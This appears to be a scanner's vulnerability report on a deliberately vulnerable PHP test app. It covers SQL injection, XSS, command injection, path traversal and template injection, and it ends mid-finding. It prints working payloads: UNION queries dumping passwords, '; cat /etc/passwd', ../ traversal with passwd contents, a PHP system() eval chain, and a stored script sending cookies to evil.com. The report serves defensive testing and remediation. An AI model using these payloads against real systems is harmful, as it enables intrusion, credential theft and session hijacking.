🗃
GGC-SQLI-AEE
8.2
HIGH
P1
Confirmed
SQL_QUERY
id
?page=sqli_first_order
10/12 hits
▼
Flow
$_GET['id'] → getParam('id') → $id → string concatenation into "SELECT * FROM users WHERE id = " . $id → pdo->query(). No prepared statement. Error messages are echoed via PDOException->getMessage(), enabling error-based SQLi. SQLite backend.
Impact
AUTH_BYPASS — Direct
CWE / CVSS
CWE-89 SQL Injection (SQLite backend) ·
CVSS 8.2 HighSQL is built from untrusted input, letting an attacker alter the query to read/modify data or bypass authentication.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:H/RC:C
ⓘ SQLite backend — impact bounded to DB read / limited write (no stacked queries, xp_cmdshell, LOAD_FILE, or host/network pivot).
Compliance Impact
A03:2021 – Injection
PCI-DSS v4.0 Req 6.2.4 (injection/XSS) · ISO/IEC 27001:2022 A.8.28 · GDPR Art. 32 (security of processing)
MITRE ATT&CK
T1190 Exploit Public-Facing Application
Initial Access
Certainty / Access
Confirmed · 🔓 Unauthenticated
Confidence & Evidence
96%High confidenceEvidence score 96/100
- +50 Confirmed (strong signal)
- +20 Direct detection (sql-error-body)
- +15 Damning token in response ("SQLSTATE")
- +6 Reproduced by 10 payload(s)
- +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i 'ggsec_test_app.php?page=sqli_first_order&id=1%22'
Reflection @ offset 101 — via sql-error-body:
…ROM users WHERE id = 1"</p><p style='color:red'>Error: SQLSTATE[HY000]: General error: 1 unrecognized token: """</p>
Evidence (live response):
…<p>Query: SELECT * FROM users WHERE id = 1"</p><p style='color:red'>Error: SQLSTATE[HY000]: General error: 1 unrecognized token: """</p>
Remediation
Use parameterized queries / prepared statements — never build queries by string concatenation.
- Replace interpolated SQL with bound parameters (PDO/mysqli prepared statements, '?'/named placeholders).
- For NoSQL, cast user input to the expected scalar type and reject array/operator inputs ((string)$x, type checks).
- Apply least-privilege DB credentials; the web user should not own DDL or admin rights.
- Add allowlist validation for structural elements that cannot be parameterized (column/table names, ORDER BY).
Refs: CWE-89 · OWASP: SQL Injection Prevention Cheat Sheet · CWE-943 (NoSQL)
| Result | Method | URL | Payload | Status | Time | Detection | DB |
| ✓ OK |
GET |
ggsec_test_app.php?page=sqli_first_order&id=1%20OR%201%3D1 |
1 OR 1=1 |
200 |
23ms |
— |
— |
| ⚠ VULN |
GET |
ggsec_test_app.php?page=sqli_first_order&id=0%20UNION%20SELECT%20usernam… |
0 UNION SELECT username,email,password,role,profile_data,search_history FROM users-- |
200 |
26ms |
sql-error-body |
SQLite |
| ⚠ VULN |
GET |
ggsec_test_app.php?page=sqli_first_order&id=0%20UNION%20SELECT%20usernam… |
0 UNION SELECT username,password,role,4,5,6 FROM users-- |
200 |
22ms |
sql-error-body |
SQLite |
| ⚠ VULN |
GET |
ggsec_test_app.php?page=sqli_first_order&id=1%20AND%201%3D2%20UNION%20SE… |
1 AND 1=2 UNION SELECT 1,2,3,4,5,6-- |
200 |
2ms |
sql-error-body |
SQLite |
| ✓ OK |
GET |
ggsec_test_app.php?page=sqli_first_order&id=1%20AND%20%28SELECT%20CASE%2… |
1 AND (SELECT CASE WHEN (1=1) THEN RANDOMBLOB(500000000) ELSE 1 END) |
200 |
2031ms |
— |
— |
| ⚠ VULN |
GET |
ggsec_test_app.php?page=sqli_first_order&id=1%20AND%201%3D1%20AND%20LIKE… |
1 AND 1=1 AND LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000)))) |
200 |
1628ms |
sql-error-body |
— |
| ⚠ VULN |
GET |
ggsec_test_app.php?page=sqli_first_order&id=1%27 |
1' |
200 |
2ms |
sql-error-body |
SQLite |
| ⚠ VULN |
GET |
ggsec_test_app.php?page=sqli_first_order&id=1%22 |
1" |
200 |
2ms |
sql-error-body |
SQLite |
| ⚠ VULN |
GET |
ggsec_test_app.php?page=sqli_first_order&id=1%20AND%20CAST%28username%20… |
1 AND CAST(username AS INT) FROM users-- |
200 |
2ms |
sql-error-body |
SQLite |
⚡
GGC-XSS-E80
5.4
MEDIUM
P2
Confirmed
XSS
search
?page=xss_reflected
6/6 hits
▼
Flow
$_GET['search'] → getParam('search') → $search → directly echoed into HTML body ("You searched for: " . $search), into an HTML attribute (value='$search'), and into a JavaScript string context (var lastSearch = '$search'). No htmlspecialchars or encoding applied in any of the three contexts.
Impact
SESSION_THEFT — Direct
CWE / CVSS
CWE-79 Cross-site Scripting ·
CVSS 5.4 Medium (Base 6.1 Medium)Untrusted input is reflected into a page without encoding, so attacker script runs in the victim's browser (session theft).
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N/E:H/RC:C
ⓘ Base 6,1 → Effective 5,4 — auth-gated (PR:L).
Compliance Impact
A03:2021 – Injection
PCI-DSS v4.0 Req 6.2.4 (injection/XSS) · ISO/IEC 27001:2022 A.8.28 · GDPR Art. 32 (security of processing)
MITRE ATT&CK
T1059.007 Command and Scripting Interpreter: JavaScript · T1185 Browser Session Hijacking
Execution, Collection
Certainty / Access
Confirmed · 👤 Customer
Confidence & Evidence
81%Medium confidenceEvidence score 81/100
- +50 Confirmed (strong signal)
- +20 Direct detection (indicator)
- +6 Reproduced by 6 payload(s)
- +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i 'ggsec_test_app.php?page=xss_reflected&search=%3Csvg%20onload%3Dalert%28%27XSS%27%29%3E'
Reflection @ offset 44 — reflected UNENCODED (executes):
<h2>Search Results</h2><p>You searched for: <svg onload=alert('XSS')></p><input type='hidden' name='q' value='<svg onload=alert('…Evidence (live response):
…lert('XSS')></p><input type='hidden' name='q' value='<svg onload=alert('XSS')>'><script>var lastSearch = '<svg onload=alert('XSS')>';</script>
Remediation
Apply context-aware output encoding on every place user data reaches HTML/JS, and add a CSP.
- Encode on output by context: HTML body (htmlspecialchars/escapeHTML), attributes, JS, URL.
- Prefer auto-escaping template engines; avoid raw echo/print of tainted data.
- Deploy a strict Content-Security-Policy and set HttpOnly on session cookies.
Refs: CWE-79 · OWASP: XSS Prevention Cheat Sheet
| Result | Method | URL | Payload | Status | Time | Detection | DB |
| ⚠ VULN |
GET |
ggsec_test_app.php?page=xss_reflected&search=%3Cscript%3Ealert%28%27XSS%… |
<script>alert('XSS')</script> |
200 |
2ms |
indicator |
— |
| ⚠ VULN |
GET |
ggsec_test_app.php?page=xss_reflected&search=%3Cimg%20src%3Dx%20onerror%… |
<img src=x onerror=alert('XSS')> |
200 |
2ms |
indicator |
— |
| ⚠ VULN |
GET |
ggsec_test_app.php?page=xss_reflected&search=%3Csvg%20onload%3Dalert%28%… |
<svg onload=alert('XSS')> |
200 |
21ms |
indicator |
— |
| ⚠ VULN |
GET |
ggsec_test_app.php?page=xss_reflected&search=%27%3Balert%28%27XSS%27%29%… |
';alert('XSS');// |
200 |
11ms |
xss-reflection |
— |
| ⚠ VULN |
GET |
ggsec_test_app.php?page=xss_reflected&search=%27%20onfocus%3Dalert%28%27… |
' onfocus=alert('XSS') autofocus=' |
200 |
11ms |
xss-reflection |
— |
| ⚠ VULN |
GET |
ggsec_test_app.php?page=xss_reflected&search=%22%3E%3Cscript%3Ealert%28%… |
"><script>alert('XSS')</script> |
200 |
2ms |
indicator |
— |
💀
GGC-RCE-FAE
8.8
HIGH
P1
Confirmed
CODE_EXEC
host
?page=cmd_exec
10/17 hits
▼
Flow
$_GET['host'] → getParam('host') → $host → string concatenation into "ping -c 1 " . $host → shell_exec(). No escapeshellarg() or whitelist. Full command injection via shell metacharacters.
CWE / CVSS
CWE-94 Code Injection ·
CVSS 8.8 High (Base 9.8 Critical)Untrusted input reaches a code interpreter (eval/include), allowing arbitrary code execution on the server.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:H/RC:C
ⓘ Base 9,8 → Effective 8,8 — auth-gated (PR:L).
Compliance Impact
A03:2021 – Injection
PCI-DSS v4.0 Req 6.2.4 (injection/XSS) · ISO/IEC 27001:2022 A.8.28 · GDPR Art. 32 (security of processing)
MITRE ATT&CK
T1190 Exploit Public-Facing Application · T1059 Command and Scripting Interpreter
Initial Access, Execution
Certainty / Access
Confirmed · 👤 Customer
Confidence & Evidence
96%High confidenceEvidence score 96/100
- +50 Confirmed (strong signal)
- +20 Direct detection (default-indicator)
- +15 Damning token in response ("www-data")
- +6 Reproduced by 10 payload(s)
- +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i 'ggsec_test_app.php?page=cmd_exec&host=%26%20whoami'
Reflection @ offset 73 — via default-indicator:
…iagnostics</h2><p>Executing: ping -c 1 & whoami</p><pre>www-data </pre>
Evidence (live response):
<h2>Network Diagnostics</h2><p>Executing: ping -c 1 & whoami</p><pre>www-data </pre>
Remediation
Never pass user input to eval/system/shell — use safe APIs, allowlists, and argument escaping.
- Eliminate eval() and dynamic code execution on tainted input entirely.
- For OS commands, use array/exec APIs that bypass the shell; escape with escapeshellarg if unavoidable.
- Validate input against a strict allowlist (e.g. a known set of hostnames/IDs).
- Run the service under a low-privilege account.
Refs: CWE-94 · CWE-78 · OWASP: OS Command Injection Defense Cheat Sheet
| Result | Method | URL | Payload | Status | Time | Detection | DB |
| ⚠ VULN |
GET |
ggsec_test_app.php?page=cmd_exec&host=%3B%20id |
; id |
200 |
11ms |
indicator |
— |
| ✓ OK |
GET |
ggsec_test_app.php?page=cmd_exec&host=%24%28id%29 |
$(id) |
200 |
10ms |
— |
— |
| ✓ OK |
GET |
ggsec_test_app.php?page=cmd_exec&host=%60id%60 |
`id` |
200 |
8ms |
— |
— |
| ⚠ VULN |
GET |
ggsec_test_app.php?page=cmd_exec&host=%3B%20cat%20%2Fetc%2Fpasswd |
; cat /etc/passwd |
200 |
10ms |
indicator |
— |
| ⚠ VULN |
GET |
ggsec_test_app.php?page=cmd_exec&host=%3B%20id%20%23 |
; id # |
200 |
7ms |
indicator |
— |
| ⚠ VULN |
GET |
ggsec_test_app.php?page=cmd_exec&host=127.0.0.1%3B%20id |
127.0.0.1; id |
200 |
7ms |
indicator |
— |
| ⚠ VULN |
GET |
ggsec_test_app.php?page=cmd_exec&host=%26%20whoami |
& whoami |
200 |
7ms |
default-indicator |
— |
| ⚠ VULN |
GET |
ggsec_test_app.php?page=cmd_exec&host=%7C%20whoami |
| whoami |
200 |
6ms |
default-indicator |
— |
| ✓ OK |
GET |
ggsec_test_app.php?page=cmd_exec&host=%26%26%20whoami |
&& whoami |
200 |
5ms |
— |
— |
| ✓ OK |
GET |
ggsec_test_app.php?page=cmd_exec&host=%26%20dir%20C%3A%5C%20%26 |
& dir C:\ & |
200 |
9ms |
— |
— |
| ⚠ VULN |
GET |
ggsec_test_app.php?page=cmd_exec&host=%3B%20sleep%205 |
; sleep 5 |
200 |
4989ms |
time-based |
— |
| ⚠ VULN |
GET |
ggsec_test_app.php?page=cmd_exec&host=%3B%20sleep%205%20%23 |
; sleep 5 # |
200 |
5002ms |
time-based |
— |
| ⚠ VULN |
GET |
ggsec_test_app.php?page=cmd_exec&host=%24%28sleep%205%29 |
$(sleep 5) |
200 |
5012ms |
time-based |
— |
| ⚠ VULN |
GET |
ggsec_test_app.php?page=cmd_exec&host=%3B%20ping%20-c%205%20127.0.0.1 |
; ping -c 5 127.0.0.1 |
200 |
4102ms |
time-based-rce |
— |
| ✓ OK |
GET |
ggsec_test_app.php?page=cmd_exec&host=%26%20timeout%20%2Ft%205%20%26 |
& timeout /t 5 & |
200 |
5ms |
— |
— |
| ✓ OK |
GET |
ggsec_test_app.php?page=cmd_exec&host=%3B%20timeout%20%2Ft%205 |
; timeout /t 5 |
200 |
5ms |
— |
— |
| ✓ OK |
GET |
ggsec_test_app.php?page=cmd_exec |
& ping -n 5 127.0.0.1 & |
0 |
25014ms |
— |
— |
🔍
GGC-PATH-42C
7.5
HIGH
P1
Confirmed
PATH_TRAVERSAL
file
?page=path_traversal
2/5 hits
▼
Flow
$_GET['file'] → getParam('file') → $file → concatenation with $basePath (__DIR__ . '/files/') → file_get_contents($target). No realpath() validation, no basename() stripping, no directory confinement check. Classic directory traversal via ../ sequences.
CWE / CVSS
CWE-22 Path Traversal / Arbitrary File Read ·
CVSS 7.5 HighUser-controlled path components escape the intended directory, exposing arbitrary files (/etc/passwd, config, source).
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:H/RC:C
Compliance Impact
A01:2021 – Broken Access Control
PCI-DSS v4.0 Req 6.2.4 / 7.2.1 · ISO/IEC 27001:2022 A.8.3 / A.5.15 · GDPR Art. 5(1)(f) + Art. 32 (confidentiality)
MITRE ATT&CK
T1083 File and Directory Discovery · T1005 Data from Local System
Discovery, Collection
Certainty / Access
Confirmed · 🔓 Unauthenticated
Confidence & Evidence
92%High confidenceEvidence score 92/100
- +50 Confirmed (strong signal)
- +20 Direct detection (indicator)
- +15 Damning token in response ("root:x:0:0")
- +2 Reproduced by 2 payload(s)
- +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i 'ggsec_test_app.php?page=path_traversal&file=..%2F..%2F..%2F..%2Fetc%2Fpasswd'
Reflection @ offset 52 — via indicator:
<h2>File Viewer</h2><p>Reading: /var/www/html/files/../../../../etc/passwd</p><pre>root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon…
Evidence (live response):
…>File Viewer</h2><p>Reading: /var/www/html/files/../../../../etc/passwd</p><pre>root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:6…
Remediation
Never build filesystem paths from user input — map requests to a fixed allowlist and canonicalize before use.
- Map the user-supplied identifier to a server-side allowlist of permitted files; never use it as a path directly.
- Canonicalize the resolved path (realpath) and verify it is still inside the intended base directory before reading.
- Reject traversal sequences AFTER decoding (../, ..\, encoded %2e%2e, and stripped variants like ....//).
- Run with least privilege so sensitive files (/etc/passwd, app secrets) are unreadable by the web user.
Refs: CWE-22 · CWE-73 · OWASP: Path Traversal · OWASP: File Path Traversal Prevention Cheat Sheet
| Result | Method | URL | Payload | Status | Time | Detection | DB |
| ✓ OK |
GET |
ggsec_test_app.php?page=path_traversal&file=..%2F..%2F..%2Fetc%2Fpasswd |
../../../etc/passwd |
200 |
5ms |
— |
— |
| ⚠ VULN |
GET |
ggsec_test_app.php?page=path_traversal&file=..%2F..%2F..%2F..%2Fetc%2Fpa… |
../../../../etc/passwd |
200 |
2ms |
indicator |
— |
| ⚠ VULN |
GET |
ggsec_test_app.php?page=path_traversal&file=..%2F..%2F..%2F..%2F..%2Fetc… |
../../../../../etc/passwd |
200 |
2ms |
indicator |
— |
| ✓ OK |
GET |
ggsec_test_app.php?page=path_traversal&file=..%252F..%252F..%252Fetc%252… |
..%2F..%2F..%2Fetc%2Fpasswd |
200 |
2ms |
— |
— |
| ✓ OK |
GET |
ggsec_test_app.php?page=path_traversal&file=....%2F%2F....%2F%2F....%2F%… |
....//....//....//etc/passwd |
200 |
2ms |
— |
— |
🗃
GGC-SQLI-DE9
8.2
HIGH
P1
Confirmed
SQL_QUERY
view_user
?page=sqli_second_order
4/4 hits
▼
Flow
$_GET['view_user'] → getParam('view_user') → $userId → string concatenation into "SELECT * FROM users WHERE id = " . $userId → pdo->query(). First-order SQLi on the view_user parameter (direct interpolation, no prepared statement).
Impact
AUTH_BYPASS — Direct
CWE / CVSS
CWE-89 SQL Injection (SQLite backend) ·
CVSS 8.2 HighSQL is built from untrusted input, letting an attacker alter the query to read/modify data or bypass authentication.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:H/RC:C
ⓘ SQLite backend — impact bounded to DB read / limited write (no stacked queries, xp_cmdshell, LOAD_FILE, or host/network pivot).
Compliance Impact
A03:2021 – Injection
PCI-DSS v4.0 Req 6.2.4 (injection/XSS) · ISO/IEC 27001:2022 A.8.28 · GDPR Art. 32 (security of processing)
MITRE ATT&CK
T1190 Exploit Public-Facing Application
Initial Access
Certainty / Access
Confirmed · 🔓 Unauthenticated
Confidence & Evidence
94%High confidenceEvidence score 94/100
- +50 Confirmed (strong signal)
- +20 Direct detection (sql-error-body)
- +15 Damning token in response ("SQLSTATE")
- +4 Reproduced by 4 payload(s)
- +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i 'ggsec_test_app.php?page=sqli_second_order&view_user=1%20OR%201%3D1'
Reflection @ offset 3924 — via sql-error-body:
…' OR SLEEP(5)--|%'</p><p style='color:red'>Error: SQLSTATE[HY000]: General error: 1 SELECTs to the left and right of U…
Evidence (live response):
…4 FROM posts--|admin' OR SLEEP(5)--|%'</p><p style='color:red'>Error: SQLSTATE[HY000]: General error: 1 SELECTs to the left and right of UNION do not have the same number of result columns</p><form method='POST'> <input name='username' placeholder='Username'>…
Remediation
Use parameterized queries / prepared statements — never build queries by string concatenation.
- Replace interpolated SQL with bound parameters (PDO/mysqli prepared statements, '?'/named placeholders).
- For NoSQL, cast user input to the expected scalar type and reject array/operator inputs ((string)$x, type checks).
- Apply least-privilege DB credentials; the web user should not own DDL or admin rights.
- Add allowlist validation for structural elements that cannot be parameterized (column/table names, ORDER BY).
Refs: CWE-89 · OWASP: SQL Injection Prevention Cheat Sheet · CWE-943 (NoSQL)
| Result | Method | URL | Payload | Status | Time | Detection | DB |
| ⚠ VULN |
GET |
ggsec_test_app.php?page=sqli_second_order&view_user=1%27 |
1' |
200 |
2ms |
sql-error-body |
SQLite |
| ⚠ VULN |
GET |
ggsec_test_app.php?page=sqli_second_order&view_user=1%20OR%201%3D1 |
1 OR 1=1 |
200 |
2ms |
sql-error-body |
SQLite |
| ⚠ VULN |
GET |
ggsec_test_app.php?page=sqli_second_order&view_user=0%20UNION%20SELECT%2… |
0 UNION SELECT username,email,password,role,profile_data,search_history FROM users-- |
200 |
2ms |
sql-error-body |
SQLite |
🗃
GGC-SQLI-181
8.2
HIGH
P1
Confirmed
SQL_QUERY
search
?page=sqli_second_order (second-order via search_history)
3/3 hits
▼
Flow
$_GET['search'] → stored into users.search_history via parameterized UPDATE (safe store) → later retrieved from DB via SELECT (using interpolated $userId) → $history → string concatenation into "SELECT * FROM posts WHERE title LIKE '%" . $history . "%'" → pdo->query(). Second-order SQLi: tainted search term persists in DB and is later interpolated into a query without sanitization.
Attack Chain
Step 1: Send GET ?page=sqli_second_order&view_user=1&search=PAYLOAD to store malicious search_history. Step 2: Send GET ?page=sqli_second_order&view_user=1 to trigger the second query that interpolates the stored history.
Impact
AUTH_BYPASS — Chained
CWE / CVSS
CWE-89 SQL Injection (SQLite backend) ·
CVSS 8.2 HighSQL is built from untrusted input, letting an attacker alter the query to read/modify data or bypass authentication.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:H/RC:C
ⓘ SQLite backend — impact bounded to DB read / limited write (no stacked queries, xp_cmdshell, LOAD_FILE, or host/network pivot).
Compliance Impact
A03:2021 – Injection
PCI-DSS v4.0 Req 6.2.4 (injection/XSS) · ISO/IEC 27001:2022 A.8.28 · GDPR Art. 32 (security of processing)
MITRE ATT&CK
T1190 Exploit Public-Facing Application
Initial Access
Certainty / Access
Confirmed · 🔓 Unauthenticated
Confidence & Evidence
93%High confidenceEvidence score 93/100
- +50 Confirmed (strong signal)
- +20 Direct detection (sql-error-body)
- +15 Damning token in response ("SQLSTATE")
- +3 Reproduced by 3 payload(s)
- +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i 'ggsec_test_app.php?page=sqli_second_order&view_user=1&search=%27%20UNION%20SELECT%201%2C2%2C3%2C4%2C5--'
Reflection @ offset 4014 — via sql-error-body:
…N SELECT 1,2,3,4,5--|%'</p><p style='color:red'>Error: SQLSTATE[HY000]: General error: 1 SELECTs to the left and right of U…
Evidence (live response):
…EEP(5)--|' UNION SELECT 1,2,3,4,5--|%'</p><p style='color:red'>Error: SQLSTATE[HY000]: General error: 1 SELECTs to the left and right of UNION do not have the same number of result columns</p><form method='POST'> <input name='username' placeholder='Username'>…
Remediation
Use parameterized queries / prepared statements — never build queries by string concatenation.
- Replace interpolated SQL with bound parameters (PDO/mysqli prepared statements, '?'/named placeholders).
- For NoSQL, cast user input to the expected scalar type and reject array/operator inputs ((string)$x, type checks).
- Apply least-privilege DB credentials; the web user should not own DDL or admin rights.
- Add allowlist validation for structural elements that cannot be parameterized (column/table names, ORDER BY).
Refs: CWE-89 · OWASP: SQL Injection Prevention Cheat Sheet · CWE-943 (NoSQL)
| Result | Method | URL | Payload | Status | Time | Detection | DB |
| ⚠ VULN |
GET |
ggsec_test_app.php?page=sqli_second_order&view_user=1&search=%27%20OR%20… |
' OR '1'='1 |
200 |
11ms |
sql-error-body |
SQLite |
| ⚠ VULN |
GET |
ggsec_test_app.php?page=sqli_second_order&view_user=1&search=%27%20UNION… |
' UNION SELECT 1,2,3,4,5-- |
200 |
67ms |
sql-error-body |
SQLite |
⚡
GGC-XSS-8BC
5.4
MEDIUM
P2
Confirmed
XSS
comment
?page=xss_stored
3/3 hits
▼
Flow
$_POST['comment'] → stored via parameterized INSERT into comments table (safe store) → later fetched via SELECT → $row['comment'] → echo $row['comment'] without any htmlspecialchars. The stored taint is rendered raw into HTML on subsequent page loads. The sink is the echo, not the INSERT.
Attack Chain
Step 1: POST to ?page=xss_stored with comment=<script>alert(1)</script>&post_id=1&author=test. Step 2: GET ?page=xss_stored&post_id=1 to see the stored XSS rendered.
Impact
SESSION_THEFT — Chained
CWE / CVSS
CWE-79 Cross-site Scripting ·
CVSS 5.4 Medium (Base 6.1 Medium)Untrusted input is reflected into a page without encoding, so attacker script runs in the victim's browser (session theft).
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N/E:H/RC:C
ⓘ Base 6,1 → Effective 5,4 — auth-gated (PR:L).
Compliance Impact
A03:2021 – Injection
PCI-DSS v4.0 Req 6.2.4 (injection/XSS) · ISO/IEC 27001:2022 A.8.28 · GDPR Art. 32 (security of processing)
MITRE ATT&CK
T1059.007 Command and Scripting Interpreter: JavaScript · T1185 Browser Session Hijacking
Execution, Collection
Certainty / Access
Confirmed · 👤 Customer
Confidence & Evidence
78%Medium confidenceEvidence score 78/100
- +50 Confirmed (strong signal)
- +20 Direct detection (stored-xss-post)
- +3 Reproduced by 3 payload(s)
- +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i -X POST 'ggsec_test_app.php?page=xss_stored&post_id=1' --data 'post_id=1&author=test&comment=<img src=x onerror=alert(1)>'
Reflection @ offset 14839 — reflected UNENCODED (executes):
…</b>: ggsecfill</div><div class='comment'><b>ggsecfill</b>: post_id=1&author=test&comment=<img src=x onerror=alert(1)></div><form method='POST'> <input type='hidden' name…
Evidence (live response):
…b></b>: </div><div class='comment'><b></b>: </div><div class='comment'><b></b>: <script>document.location='http://evil.com/?c='+document.cookie</script></div><div class='comment'><b></b>: </div><div class='comment'><b></b>: </div><div class='comment'><b></b>: </div><div class='co…
Remediation
Apply context-aware output encoding on every place user data reaches HTML/JS, and add a CSP.
- Encode on output by context: HTML body (htmlspecialchars/escapeHTML), attributes, JS, URL.
- Prefer auto-escaping template engines; avoid raw echo/print of tainted data.
- Deploy a strict Content-Security-Policy and set HttpOnly on session cookies.
Refs: CWE-79 · OWASP: XSS Prevention Cheat Sheet
| Result | Method | URL | Payload | Status | Time | Detection | DB |
⚡
GGC-XSS-91F
5.4
MEDIUM
P2
Confirmed
XSS
author
?page=xss_stored
2/2 hits
▼
Flow
$_POST['author'] → stored via parameterized INSERT into comments.author (safe store) → later fetched via SELECT → $row['author'] → echo "<b>" . $row['author'] . "</b>" without htmlspecialchars. Separate stored XSS vector from the 'comment' field.
Attack Chain
Step 1: POST to ?page=xss_stored with author=<script>alert(1)</script>&post_id=1&comment=test. Step 2: GET ?page=xss_stored&post_id=1 to see the stored XSS in the author field.
Impact
SESSION_THEFT — Chained
CWE / CVSS
CWE-79 Cross-site Scripting ·
CVSS 5.4 Medium (Base 6.1 Medium)Untrusted input is reflected into a page without encoding, so attacker script runs in the victim's browser (session theft).
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N/E:H/RC:C
ⓘ Base 6,1 → Effective 5,4 — auth-gated (PR:L).
Compliance Impact
A03:2021 – Injection
PCI-DSS v4.0 Req 6.2.4 (injection/XSS) · ISO/IEC 27001:2022 A.8.28 · GDPR Art. 32 (security of processing)
MITRE ATT&CK
T1059.007 Command and Scripting Interpreter: JavaScript · T1185 Browser Session Hijacking
Execution, Collection
Certainty / Access
Confirmed · 👤 Customer
Confidence & Evidence
77%Medium confidenceEvidence score 77/100
- +50 Confirmed (strong signal)
- +20 Direct detection (stored-xss-post)
- +2 Reproduced by 2 payload(s)
- +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i -X POST 'ggsec_test_app.php?page=xss_stored&post_id=1' --data 'post_id=1&author=<script>alert(1)</script>&comment=safe'
Reflection @ offset 14927 — reflected UNENCODED (executes):
…t=<img src=x onerror=alert(1)></div><div class='comment'><b>post_id=1&author=<script>alert(1)</script>&comment=safe</b>: ggsecfill</div><form method='POST'> <input typ…
Evidence (live response):
…b></b>: </div><div class='comment'><b></b>: </div><div class='comment'><b></b>: <script>document.location='http://evil.com/?c='+document.cookie</script></div><div class='comment'><b></b>: </div><div class='comment'><b></b>: </div><div class='comment'><b></b>: </div><div class='co…
Remediation
Apply context-aware output encoding on every place user data reaches HTML/JS, and add a CSP.
- Encode on output by context: HTML body (htmlspecialchars/escapeHTML), attributes, JS, URL.
- Prefer auto-escaping template engines; avoid raw echo/print of tainted data.
- Deploy a strict Content-Security-Policy and set HttpOnly on session cookies.
Refs: CWE-79 · OWASP: XSS Prevention Cheat Sheet
| Result | Method | URL | Payload | Status | Time | Detection | DB |
⚡
GGC-XSS-775
5.4
MEDIUM
P2
Confirmed
XSS
hash (location.hash)
?page=xss_dom
2/2 hits
▼
Flow
DOM-based XSS: window.location.hash.substring(1) → decodeURIComponent() → document.getElementById('output').innerHTML = decoded. Purely client-side taint flow from URL fragment to innerHTML sink. Cannot be confirmed by HTTP-only DAST — requires headless browser verification.
Impact
SESSION_THEFT — Direct
CWE / CVSS
CWE-79 Cross-site Scripting ·
CVSS 5.4 Medium (Base 6.1 Medium)Untrusted input is reflected into a page without encoding, so attacker script runs in the victim's browser (session theft).
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N/E:H/RC:C
ⓘ Base 6,1 → Effective 5,4 — auth-gated (PR:L).
Compliance Impact
A03:2021 – Injection
PCI-DSS v4.0 Req 6.2.4 (injection/XSS) · ISO/IEC 27001:2022 A.8.28 · GDPR Art. 32 (security of processing)
MITRE ATT&CK
T1059.007 Command and Scripting Interpreter: JavaScript · T1185 Browser Session Hijacking
Execution, Collection
Certainty / Access
Confirmed · 👤 Customer
Confidence & Evidence
77%Medium confidenceEvidence score 77/100
- +50 Confirmed (strong signal)
- +20 Direct detection (xss-reflection)
- +2 Reproduced by 2 payload(s)
- +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i 'ggsec_test_app.php?page=xss_dom&hash%20%28location.hash%29=%23%3Csvg%20onload%3Dalert%28%27XSS%27%29%3E#<img src=x onerror=alert(1)>'
Evidence (live response):
…e></head> <body> <h2>DOM-based XSS</h2> <div id="output"></div> <script> // PODATNOŚĆ: location.hash użyty bezpośrednio w innerHTML // Taint flow: URL fragment → decodeURIComponent → innerHTML var hash = window.location.hash.substring(1);…
Remediation
Apply context-aware output encoding on every place user data reaches HTML/JS, and add a CSP.
- Encode on output by context: HTML body (htmlspecialchars/escapeHTML), attributes, JS, URL.
- Prefer auto-escaping template engines; avoid raw echo/print of tainted data.
- Deploy a strict Content-Security-Policy and set HttpOnly on session cookies.
Refs: CWE-79 · OWASP: XSS Prevention Cheat Sheet
| Result | Method | URL | Payload | Status | Time | Detection | DB |
| ⚠ VULN |
GET |
ggsec_test_app.php?page=xss_dom&hash%20%28location.hash%29=%23%3Cimg%20s… |
#<img src=x onerror=alert('XSS')> |
200 |
35ms |
xss-reflection |
— |
| ⚠ VULN |
GET |
ggsec_test_app.php?page=xss_dom&hash%20%28location.hash%29=%23%3Csvg%20o… |
#<svg onload=alert('XSS')> |
200 |
1ms |
xss-reflection |
— |
🔍
GGC-SSTI-6EC
9.8
CRITICAL
P0
Confirmed
SSTI
content
?page=ssti
3/3 hits
▼
Flow
Second-order SSTI: $_POST['content'] → stored via parameterized INSERT into posts.content (safe store) → later retrieved via SELECT on GET ?page=ssti&render=<id> → if template_engine='php', eval('?>' . $template) is called on the stored content. Full RCE via eval(). Requires two steps: store with engine=php, then render. Also a Twig simulation path echoes content directly (XSS-like, not true Twig eval).
Attack Chain
Step 1: POST ?page=ssti with title=test&content=<?php system('id'); ?>&engine=php to store. Step 2: GET ?page=ssti&render=<newId> to trigger eval() on the stored PHP content.
CWE / CVSS
CWE-1336 Server-Side Template Injection ·
CVSS 9.8 CriticalUntrusted input reaches a server-side template engine, executing template expressions and often OS commands.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RC:C
Compliance Impact
A03:2021 – Injection
PCI-DSS v4.0 Req 6.2.4 (injection/XSS) · ISO/IEC 27001:2022 A.8.28 · GDPR Art. 32 (security of processing)
MITRE ATT&CK
T1190 Exploit Public-Facing Application · T1059 Command and Scripting Interpreter
Initial Access, Execution
Certainty / Access
Confirmed · 🔓 Unauthenticated
Confidence & Evidence
93%High confidenceEvidence score 93/100
- +50 Confirmed (strong signal)
- +20 Direct detection (ssti-rce-eval)
